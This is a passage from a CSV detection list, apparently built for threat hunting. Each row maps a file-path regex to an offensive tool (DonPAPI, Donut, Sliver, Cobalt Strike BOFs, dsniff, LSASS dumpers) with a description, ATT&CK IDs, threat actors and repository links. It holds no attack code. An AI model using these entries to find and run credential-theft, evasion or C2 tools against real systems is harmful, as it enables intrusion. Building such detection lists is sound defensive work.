T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Dome.git*",".{0,1000}\/Dome\.git.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*/domino-enum-users.nse*",".{0,1000}\/domino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dompdf-rce*",".{0,1000}\/dompdf\-rce.{0,1000}","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","175","66","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z" "*/DonPAPI.git*",".{0,1000}\/DonPAPI\.git.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/DonPAPI.py*",".{0,1000}\/DonPAPI\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/DonPAPI.zip*",".{0,1000}\/DonPAPI\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/donut *.exe*",".{0,1000}\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/donut.exe*",".{0,1000}\/donut\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/donut.git",".{0,1000}\/donut\.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/Donut_Linux*",".{0,1000}\/Donut_Linux.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*/Donut_Windows*",".{0,1000}\/Donut_Windows.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*/DonutCS/Donut.cs*",".{0,1000}\/DonutCS\/Donut\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/donutmodule.c*",".{0,1000}\/donutmodule\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/DonutTest/*",".{0,1000}\/DonutTest\/.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/DotNet/SigFlip*",".{0,1000}\/DotNet\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/DoUCMe.git*",".{0,1000}\/DoUCMe\.git.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*/download/v*/sliver-client_linux*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/download/v1.0/payload.dll*",".{0,1000}\/download\/v1\.0\/payload\.dll.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*/download/v1.1.0/pspy32*",".{0,1000}\/download\/v1\.1\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.1.0/pspy64*",".{0,1000}\/download\/v1\.1\.0\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.0/pspy32*",".{0,1000}\/download\/v1\.2\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.1/pspy32*",".{0,1000}\/download\/v1\.2\.1\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/download/v1.2.1/pspy64*",".{0,1000}\/download\/v1\.2\.1\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/downloadexec.lua*",".{0,1000}\/downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/download-stager.js*",".{0,1000}\/download\-stager\.js.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*/dpap-brute.nse*",".{0,1000}\/dpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Dpapi.ps1*",".{0,1000}\/Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/dpapi_domain_backupkey.py*",".{0,1000}\/dpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/dpapi_masterkey.py*",".{0,1000}\/dpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/DPAPImk2john.py*",".{0,1000}\/DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/dpipe.sh*",".{0,1000}\/dpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "*/dpkg/info/tor.list*",".{0,1000}\/dpkg\/info\/tor\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/dploot.git*",".{0,1000}\/dploot\.git.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*/DragonCastle.git*",".{0,1000}\/DragonCastle\.git.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/DragonCastle.pdb*",".{0,1000}\/DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/dragoncastle.py*",".{0,1000}\/dragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*/drda-brute.nse*",".{0,1000}\/drda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/drda-info.nse*",".{0,1000}\/drda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DReverseProxy.git*",".{0,1000}\/DReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/Drones/SleepDialogue.razor*",".{0,1000}\/Drones\/SleepDialogue\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/drop-sc.py*",".{0,1000}\/drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/drunkpotato*",".{0,1000}\/drunkpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Drupwn*",".{0,1000}\/Drupwn.{0,1000}","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","561","131","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" "*/DSInternals.psd1*",".{0,1000}\/DSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","1","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*/dsniff.c*",".{0,1000}\/dsniff\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dsniff.services*",".{0,1000}\/dsniff\.services.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/DUBrute.git*",".{0,1000}\/DUBrute\.git.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*/DuckDuckC2.git*",".{0,1000}\/DuckDuckC2\.git.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*/ducky.py",".{0,1000}\/ducky\.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/DueDLLigence.git*",".{0,1000}\/DueDLLigence\.git.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*/dukes_apt29.profile*",".{0,1000}\/dukes_apt29\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/dump.ps1*",".{0,1000}\/dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/dump_lsass.*",".{0,1000}\/dump_lsass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 